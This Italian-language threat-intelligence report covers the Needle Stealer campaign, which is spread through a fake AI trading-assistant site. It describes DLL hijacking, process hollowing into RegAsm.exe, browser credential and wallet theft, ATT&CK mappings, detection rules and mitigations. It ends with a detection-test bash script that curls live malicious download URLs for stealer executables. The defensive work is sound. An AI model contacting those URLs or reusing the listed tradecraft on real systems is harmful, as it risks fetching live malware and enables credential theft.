Segui 
Detection stack
- AIDR
- Alert
- ETL
- Query
Riassunto
Un sito web fraudolento che pubblicizza un assistente commerciale basato su intelligenza artificiale è utilizzato per diffondere il malware Needle Stealer. La catena di infezione si basa sul dirottamento di DLL e sul processo di hollowing per iniettare il malware in RegAsm.exe, aiutandolo a mimetizzarsi con l’attività legittima del sistema. Una volta attivo, il malware raccoglie dati del browser, prende di mira informazioni sul portafoglio di criptovalute e può distribuire estensioni del browser dannose per approfondire la compromissione. La comunicazione con l’infrastruttura controllata dagli aggressori avviene tramite più endpoint API HTTP.
Indagine
I ricercatori hanno tracciato il flusso di infezione a un archivio ZIP scaricato da tradingclaw.pro, che conteneva un caricatore DLL chiamato iviewers.dll. Questo caricatore ha lasciato cadere una DLL di seconda fase che ha svuotato RegAsm.exe e ha lanciato il Needle Stealer basato su Golang. Ulteriori analisi hanno mostrato che il malware ha estratto archivi ZIP nascosti contenenti estensioni del browser dannose insieme a un file di configurazione che definiva i suoi server di comando e controllo.
Mitigazione
Gli utenti dovrebbero evitare di scaricare software da siti web non attendibili e verificare sempre le firme dell’editore prima di eseguire qualsiasi installatore. I team di sicurezza dovrebbero regolarmente controllare le estensioni del browser installate e rimuovere quelle che sembrano non autorizzate o sospette. Il monitoraggio della rete dovrebbe essere configurato per rilevare il traffico verso i domini e gli indirizzi IP noti come dannosi connessi alla campagna. Gli strumenti di protezione degli endpoint dovrebbero anche essere adattati per identificare comportamenti di dirottamento di DLL e tecniche di hollowing dei processi.
Risposta
I difensori dovrebbero esaminare la telemetria degli endpoint per l’esecuzione di iviewers.dll e segni di iniezione in RegAsm.exe. I domini di comando e controllo identificati e gli indirizzi IP dovrebbero essere bloccati a livello di firewall o proxy. I team di sicurezza dovrebbero mettere in quarantena i file che corrispondono agli hash o ai nomi di file segnalati, rimuovere le estensioni sospette da %LOCALAPPDATA%PackagesExtensions, e reimpostare le credenziali collegate agli account compromessi. Qualsiasi portafoglio di criptovaluta potenzialmente colpito dovrebbe anche essere controllato per attività non autorizzate.
"graph TB %% Class definitions classDef action fill:#99ccff classDef malware fill:#ff9999 classDef process fill:#ccccff %% Nodes step_a["<b>Azione</b> – <b>T1659 Iniezione di Contenuti</b><br/>L’utente visita il sito TradingClaw dannoso per ottenere contenuti dannosi.<br/><b>Descrizione</b>: Gli avversari iniettano contenuti dannosi in un sito web legittimo per fornire payload."] class step_a action step_b["<b>Azione</b> – <b>T1204.001 Collegamento Dannoso</b><br/>L’utente clicca e scarica l’archivio ZIP dannoso.<br/><b>Descrizione</b>: L’utente viene ingannato a cliccare su un link dannoso che porta al furto delle credenziali o ad altri download di payload."] class step_b action step_c["<b>Azione</b> – Tecniche multiple<br/><b>Masquerading T1036.001</b>: iviewers.dll imita un file legittimo.<br/><b>Sovvertire i Controlli di Fiducia T1553.002</b>: Aggirare la fiducia dirottando DLL.<br/><b>Esecuzione Proxy di Binario di Sistema T1218</b>: Utilizzo del binario di sistema per l’esecuzione.<br/><b>Proxy di Utilità di Sviluppatore Affidabili T1127</b>: Abuso di utilità affidabili.<br/><b>Caricamento Riflettivo del Codice T1620</b>: Caricare il codice senza toccare il disco.<br/><b>Descrizione</b>: Dirottamento di DLL tramite iviewers.dll per eseguire codice dannoso."] class step_c action step_d["<b>Iniezione di Processo</b> – <b>T1055.012 Hollowing del Processo</b><br/>Codice dannoso iniettato nel processo RegAsm.exe.<br/><b>Descrizione</b>: L’avversario crea un processo vuoto e inserisce un payload dannoso."] class step_d process step_e["<b>Malware</b> – Core Needle Stealer<br/>Raccoglie dati della vittima dopo l’esecuzione."] class step_e malware step_f["<b>Accesso alle Credenziali</b> – <b>T1115 Dati Appunti</b><br/>Raccoglie i contenuti degli appunti.<br/><b>Descrizione</b>: Cattura i dati copiati negli appunti come le password."] class step_f action step_g["<b>Cattura di Input</b> – <b>T1056 Cattura di Input</b><br/>Capture forma gli input digitati.<br/><b>Descrizione</b>: Registra i tasti digitati o i campi del modulo per rubare le credenziali."] class step_g action step_h["<b>Accesso alle Credenziali</b> – Tecniche multiple<br/><b>Scoperta delle Informazioni del Browser T1217</b>: Elenca i browser installati.<br/><b>Credenziali dai Browser Web T1555.003</b>: Estrae le password salvate.<br/><b>Cookie di Sessione Web T1550.004</b>: Legge i cookie di sessione.<br/><b>Rubare il Cookie di Sessione Web T1539</b>: Esfiltra i cookie.<br/><b>Forgiare le Credenziali Web T1606</b>: Crea credenziali false.<br/><b>Descrizione</b>: Ruba dati del browser, credenziali e cookie."] class step_h action step_i["<b>Persistenza</b> – <b>T1176 Estensioni Software</b><br/>Installa un’estensione del browser dannosa.<br/><b>Descrizione</b>: L’estensione persiste nel browser e può modificare il traffico."] class step_i action step_j["<b>Azione</b> – L’estensione manipola il traffico<br/>Reindirizza le richieste, sostituisce i download, inietta script."] class step_j action step_k["<b>Comando e Controllo</b> – Tecniche multiple<br/><b>Codifica dei Dati T1132.001</b>: Codifica i dati prima dell’esfiltrazione.<br/><b>Esfiltrazione sul Canale C2 T1041</b>: Invia dati tramite C2.<br/><b>Descrizione</b>: Comunica dati rubati a un server remoto."] class step_k action %% Connections step_a –>|porta a| step_b step_b –>|porta a| step_c step_c –>|porta a| step_d step_d –>|porta a| step_e step_e –>|raccoglie| step_f step_e –>|raccoglie| step_g step_e –>|raccoglie| step_h step_e –>|installa| step_i step_i –>|abilita| step_j step_j –>|comunica| step_k "
Flusso di Attacco
Rilevamenti
Possibile Tentativo di DLL Side Loading Usando Oleview (tramite image_load)
Visualizza
Comando e Controllo Sospetto da Richiesta DNS di Dominio di Primo Livello Insolito (TLD) (tramite dns)
Visualizza
IOC (HashSha256) per rilevare: Sito web di trading dannoso distribuisce malware che consegna il tuo browser agli hacker
Visualizza
IOC (SourceIP) per rilevare: Sito web di trading dannoso distribuisce malware che consegna il tuo browser agli hacker
Visualizza
IOC (DestinationIP) per rilevare: Sito web di trading dannoso distribuisce malware che consegna il tuo browser agli hacker
Visualizza
Rilevamento di TradingClaw Dannoso e Siti di Reindirizzamento [Webserver]
Visualizza
Esecuzione di Simulazione
Prerequisito: Il Controllo di Prevolo della Telemetria e Baseline deve essere stato superato.
Ragionamento: Questa sezione dettaglia l’esecuzione precisa della tecnica dell’avversario (TTP) progettata per attivare la regola di rilevamento. I comandi e la narrazione DEVONO riflettere direttamente i TTP identificati e mirare a generare esattamente la telemetria prevista dalla logica di rilevamento.
-
Narrazione degli Attacchi & Comandi:
Un avversario che ha ottenuto il malware Needle Stealer lo ospita sul dominio dannosotradingclaw.pro. L’attaccante persuade una vittima ad aprire un link dannoso (ad es., tramite un’e-mail di phishing). Il browser della vittima effettua una richiesta HTTP GET ahttp://tradingclaw.pro/stealer.exe, che i registri del proxy. Poiché l’URL contiene la stringa esattatradingclaw.pro, la condizione della regola Sigma (url|contains) valuta a vero, generando un avviso.Per replicare ciò in un ambiente di test, emettiamo un
curldiretto al dominio dannoso. La richiesta è progettata per sembrare un traffico tipico dell’utente (User-Agent standard, nessuna intestazione speciale) in modo che solo la corrispondenza del dominio attivi l’allerta. -
Script di Test di Regressione:
#!/usr/bin/env bash # ------------------------------------------------------------ # Simulazione di accesso dannoso per attivare la regola di rilevamento "TradingClaw Dannoso" # ------------------------------------------------------------ set -euo pipefail # Definisci gli URL dannosi (stringhe esatte usate dalla regola) MALICIOUS_URLS=( "http://tradingclaw.pro/stealer.exe" "https://studypages.com/download/needle.exe" ) for url in "${MALICIOUS_URLS[@]}"; do echo "[*] Richiesta a ${url}" # Usa un user-agent realistico per imitare un browser curl -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0 Safari/537.36" -s -o /dev/null "${url}" done echo "[+] Simulazione completata." -
Comandi di Pulizia:
# Nessun artefatto persistente viene creato dalle richieste curl. # Svuota la cache DNS per evitare il riutilizzo accidentale del dominio nei test successivi. if command -v ipconfig >/dev/null 2>&1; then ipconfig /flushdns elif command -v systemd-resolve >/dev/null 2>&1; then systemd-resolve --flush-caches fi echo "[+] Pulizia completata."
Fine del Rapporto